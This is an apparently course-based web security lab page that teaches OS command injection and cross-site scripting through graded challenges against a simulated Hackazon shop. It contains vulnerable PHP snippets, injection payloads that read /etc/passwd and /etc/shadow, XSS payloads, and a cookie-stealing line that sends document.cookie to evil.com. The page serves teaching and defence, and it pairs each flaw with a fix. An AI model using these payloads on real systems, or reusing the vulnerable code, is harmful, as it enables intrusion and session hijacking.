Web Software Security Learn
Web Software Security — Command Injection & XSS
0/6
Score: 0 / 600
Navigation
Command Injection
Cross-Site Scripting
Report

Web Software Security
Lab 7 — Part 2

This lab covers two of the most critical and prevalent web vulnerabilities: OS Command Injection and Cross-Site Scripting (XSS). Both arise from insufficient input validation and have appeared in countless real-world breaches.

Work through 6 guided challenges using a simulated Hackazon vulnerable application. Each challenge awards up to 100 points.

  • CI-1Background: why command injection happens and how it works
  • CI-2Execute directory listing via injected OS command
  • CI-3Read sensitive system files (/etc/passwd, shadow)
  • XSS-1Reflected vs Stored XSS — concepts & classification
  • XSS-2Stored XSS: inject persistent JavaScript into the FAQ page
  • XSS-3Reflected XSS: steal session cookies via crafted link

⚠ All exercises run in this self-contained simulator. Do not attempt these techniques on systems you do not own.

CI-1
Command Injection — Concept & Setup
OS InjectionOWASP A03100 pts
★ 100 points — complete the quiz below to earn full marks
Background: The Hackazon My Documents page passes a user-supplied filename directly to the shell:

$page = $_GET['page']; $output = shell_exec("cat documents/$page");

Because there is no sanitisation, an attacker can append shell metacharacters. The pipe ( | ) and semicolon ( ; ) are command separators in Unix. Injecting test|/bin/ls causes the server to run both commands.
🔍 Key Concept
Vulnerable URL: http://hackazon.jonesey.com.au/account/documents?page=terms.html
Inject by changing terms.html to test|/bin/ls
How this vulnerability arises
1
User navigates to /account/documents?page=terms.html
2
PHP runs: shell_exec("cat documents/terms.html") — safe
3
Attacker changes page to test|/bin/ls
4
Server runs: shell_exec("cat documents/test|/bin/ls") — shell interprets | and runs ls
5
Output of /bin/ls rendered in browser — attacker sees the directory listing

Answer all three questions to unlock the next challenge.

Q1: Which character(s) can be used to chain/separate OS commands in a Unix shell?

Hashtag (#) — it starts a comment
Semicolon (;) or pipe (|) — they chain commands
Dollar sign ($) — it denotes a variable
Backslash (\) — escape character

Q2: What is the primary fix for OS command injection?

Encrypt the URL parameters
Use HTTPS instead of HTTP
Never pass user input to shell functions; use parameterised APIs with whitelisting
Hide the page parameter from the URL

Q3: In ?page=test|/bin/ls, which part is the injected command?

page= (the parameter name)
test (the dummy filename)
/bin/ls (the command after the pipe separator)
documents/ (the directory prefix)
🏆
CI-1 Complete! +100 ptsYou understand command injection. Now exploit it in practice.
CI-2
Command Injection — Directory Listing
Remote Code ExecutionHands-On100 pts
★ 100 points — inject commands to discover the server filesystem
Task: The simulated Hackazon page passes your page input directly to a shell. Inject Linux commands to explore the filesystem, then answer the lab questions.

Vulnerable code: shell_exec("cat documents/" . $_GET['page'])
🔍 Hints
• List current directory: test|/bin/ls
• Human-readable listing: test|/bin/ls -lh
• List root directory: test|/bin/ls /
• Show working path: test|/bin/pwd
• Show server user: test|whoami
http://hackazon.jonesey.com.au/account/documents?page=terms.html
Hackazon — Documents
Modify the page parameter to inject commands.
$ Ready. Enter a page parameter and click Load Page.
/* Vulnerable PHP — /account/documents */ $page = $_GET['page']; $output = shell_exec("cat documents/" . $page); // NO sanitisation! echo "<pre>$output</pre>";
🏆
CI-2 Complete! +100 ptsYou listed the server filesystem via a web form. Now read sensitive files.
CI-3
Command Injection — Reading System Files
Credential ExposureHands-On100 pts
★ 100 points — attempt to read /etc/passwd and /etc/shadow
Task: Using the same injection technique, attempt to read sensitive system files. /etc/passwd contains the user account list. /etc/shadow contains hashed passwords but is protected by file permissions.
🔍 Hints
• Read user list: test|cat /etc/passwd
• Attempt shadow file: test|cat /etc/shadow
• Check file permissions: test|/bin/ls -la /etc/shadow
http://hackazon.jonesey.com.au/account/documents?page=terms.html
Hackazon — Documents (Injection Terminal)
$ Ready.
🏆
CI-3 Complete! +100 ptsCommand injection is OWASP Top 10 #3. Fix: never pass user input to shell functions.
XSS-1
Cross-Site Scripting — Concepts
XSSOWASP A03100 pts
★ 100 points — answer the concept quiz
Cross-Site Scripting (XSS) occurs when a web application includes user-supplied data in its HTML output without proper encoding. Browsers trust all content from a server — injected JavaScript executes in the victim's context.

Reflected XSS: The script is in the URL — it bounces off the server into the response.

Stored XSS: The script is saved to the database — every future visitor executes it. Far more dangerous.
Attack flow — Stored XSS
1
Attacker submits <script>alert(document.cookie)</script> in a form
2
Server stores the raw string in the database without HTML-encoding
3
Victim visits the page — server echoes the stored string into HTML
4
Browser executes the <script> in the victim's session
5
Script reads document.cookie and sends it to the attacker — session hijacked

Q1: What distinguishes Stored XSS from Reflected XSS?

Stored XSS uses SQL; Reflected XSS uses JavaScript
Stored XSS persists in the database and affects all visitors; Reflected XSS only affects users who click a crafted link
Reflected XSS is more dangerous because it's harder to detect
There is no difference — both work identically

Q2: Why does XSS bypass the Same Origin Policy (SOP)?

The attacker's script runs from a different domain, which SOP ignores
The script is served by the legitimate site — SOP allows same-origin scripts to access cookies and DOM, so the injected script gets those privileges
Browsers don't enforce SOP for JavaScript in forms
XSS only works on HTTP sites, not HTTPS

Q3: What is the primary defence against XSS?

Block all form submissions containing angle brackets
Use HTTPS on the server
HTML-encode all user-supplied output: < becomes &lt; etc. (PHP's htmlspecialchars())
Require users to log in before viewing comments
🏆
XSS-1 Complete! +100 ptsSolid understanding of XSS theory. Now exploit it hands-on.
XSS-2
Stored XSS — FAQ Injection
Stored XSSHands-On100 pts
★ 100 points — inject a persistent script into the FAQ page
Background: The FAQ page stores questions raw and echoes them without encoding.

Vulnerable: echo "<p>" . $question . "</p>";
Fix: echo "<p>" . htmlspecialchars($question) . "</p>";
🔍 Hints
Classic payload: <script>alert('XSS!!')</script>
Alternative: <img src=x onerror="alert('XSS!')">
http://hackazon.jonesey.com.au/faq
Frequently Asked Questions
I want to return my purchase! What do I do?
Do you accept international credit cards?
What can cause my order to be delayed?
/* Vulnerable PHP — /faq page */ $question = $_POST['question']; $db->query("INSERT INTO faq (question) VALUES ('$question')"); foreach($db->query("SELECT * FROM faq") as $row) { echo "<p>" . $row['question'] . "</p>"; // NO htmlspecialchars()! } // Fix: echo "<p>" . htmlspecialchars($row['question'], ENT_QUOTES, 'UTF-8') . "</p>";
🏆
XSS-2 Complete! +100 ptsYou injected persistent JavaScript. Every visitor to that FAQ page would now execute your script.
XSS-3
Reflected XSS — Cookie Theft
Reflected XSSSession Hijack100 pts
★ 100 points — steal a session cookie via reflected XSS
Background: The Hackazon search page reflects the search term into the page without encoding. Inject JavaScript that reads document.cookie to expose the victim's session.
🔍 Step by Step
Step 1: Test basic XSS: <script>alert('XSS')</script>
Step 2: Steal cookie: <script>alert(document.cookie)</script>
Step 3: Real attack: new Image().src='http://evil.com/?c='+document.cookie
http://hackazon.jonesey.com.au/search?searchString=
Hackazon — Search
/* Vulnerable PHP — /search */ $term = $_GET['searchString']; echo "Search by «" . $term . "»"; // REFLECTED without encoding! // Fix: echo "Search by «" . htmlspecialchars($term, ENT_QUOTES) . "»";
Simulated Session Cookie
PHPSESSID=545b0ngecpe2ugulf7eb7iufb0; visited_products=%2C116%2C1%2C
This is what document.cookie returns for a logged-in Hackazon user.
🏆
XSS-3 Complete! +100 ptsYou demonstrated a complete session-hijacking attack chain. In a real attack, this cookie gives the attacker full account access.
Lab Report & Score
CSE1CPR Lab 7 Part 2
🎖
FINAL SCORE
0
out of 600 points
ChallengeTopicMaxEarnedStatus
CI-1Command Injection — Concept & Setup1000
CI-2Directory Listing via Injection1000
CI-3Reading System Files1000
XSS-1XSS Concepts Quiz1000
XSS-2Stored XSS — FAQ Injection1000
XSS-3Reflected XSS & Cookie Theft1000
Total6000
Instructor Grading Guide
CI-2 & CI-3 — Award marks based on reflection quality. Students should identify correct commands, show actual output, and explain significance.
XSS-2 & XSS-3 — Students should demonstrate payload execution (modal must fire) and show understanding of impact and defences.
Full marks — Require both correct technical execution AND thoughtful written answers.

Post a Comment

Please do not enter any spam links in the comments...

Post a Comment

Please do not enter any spam links in the comments...

Previous Post Next Post